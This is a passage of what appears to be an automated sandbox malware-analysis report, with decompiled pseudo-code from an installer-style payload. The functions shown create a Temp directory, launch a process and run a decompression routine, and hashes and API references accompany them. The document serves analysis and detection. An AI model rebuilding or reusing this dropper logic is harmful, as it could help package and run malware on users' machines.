						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405455(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405472(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E004053D8(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CF9("C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Chipyard\\reconfiguration", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d2
0x004015d4
0x004015d8
0x004015db
0x004015f3
0x004015f4
0x004015dd
0x004015dd
0x004015e0
0x00000000
0x004015eb
0x004015ec
0x004015ec
0x004015e0
0x004015fb
0x00401602
0x0040160f
0x0040160f
0x00401604
0x00401605
0x0040160d
0x00000000
0x00000000
0x0040160d
0x00401602
0x00401612
0x00401615
0x00401617
0x00401618
0x004015c8
0x0040161f
0x0040164a
0x004021c4
0x00401621
0x00401623
0x0040162e
0x00401634
0x0040163c
0x00401642
0x00401642
0x0040163c
0x004028d2
0x004028de

APIs

Part of subcall function 00405804: CharNextA.USER32(?), ref: 00405812
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 004053D8: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541B

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration, xrefs: 00401629

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration
API String ID: 1892508949-2371970288
Opcode ID: 35b5ce37ea2c102454e257f7c2ebfae98d79ea08dc301c245ac192245ac20f33
Instruction ID: 4fb2b9239308f527e4829455642bf5c86be9504270dcf99fcce102751257b2ff
Opcode Fuzzy Hash: 35b5ce37ea2c102454e257f7c2ebfae98d79ea08dc301c245ac192245ac20f33
Instruction Fuzzy Hash: 1611E736508141ABEF217F650D415BF27B0EA92325738467FE592B62E2C63C4942A63F

Uniqueness

Uniqueness Score: -1.00%

Function 00404E86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00404E86(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x41fcf4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x41fcf4 = _t16;
							E0040485D();
						}
						L11:
						_t9 = CallWindowProcA( *0x41fcfc, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E004047DD(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F2A(0x413);
				return 0;
			}

0x00404e8a
0x00404e94
0x00404eb0
0x00404ed2
0x00404ed5
0x00404edb
0x00404ee5
0x00404ee6
0x00404ee8
0x00404eee
0x00404eee
0x00404ef8
0x00404f06
0x00000000
0x00404f06
0x00404ebd
0x00404ef5
0x00404ef5
0x00000000
0x00404ef5
0x00404ec9
0x00404ecb
0x00000000
0x00404ecb
0x00404e9a
0x00000000
0x00000000
0x00404ea1
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404EB5
CallWindowProcA.USER32(?,?,?,?), ref: 00404F06

Part of subcall function 00403F2A: SendMessageA.USER32 ref: 00403F3C

Strings

, xrefs: 00404E96

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
Instruction ID: f49a9e3fcece2dd6490d1841f3d0f5b5163df4d3f93a23d44cf999a9bd086e10
Opcode Fuzzy Hash: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
Instruction Fuzzy Hash: D10171B110020EABDF209F11DC84A9B3725FBC4754F208037FB11761D1DB799C61A7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040548A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040548A(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x421510->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x421510,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405493
0x004054b3
0x004054bb
0x004054c0
0x00000000
0x004054c6
0x004054ca

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
CloseHandle.KERNEL32(?), ref: 004054C0

Strings

Error launching installer, xrefs: 0040549D

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
Instruction ID: 90ee3f3d0c484d323fd0424032eb65db2415cafeee3384e03f1d9bc4b04e7a5d
Opcode Fuzzy Hash: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
Instruction Fuzzy Hash: FFE04FB4A002097FEB009B60EC05F7B7BBCEB00348F408561BD11F21A0E374A9508A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406779 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406779() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BE7))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
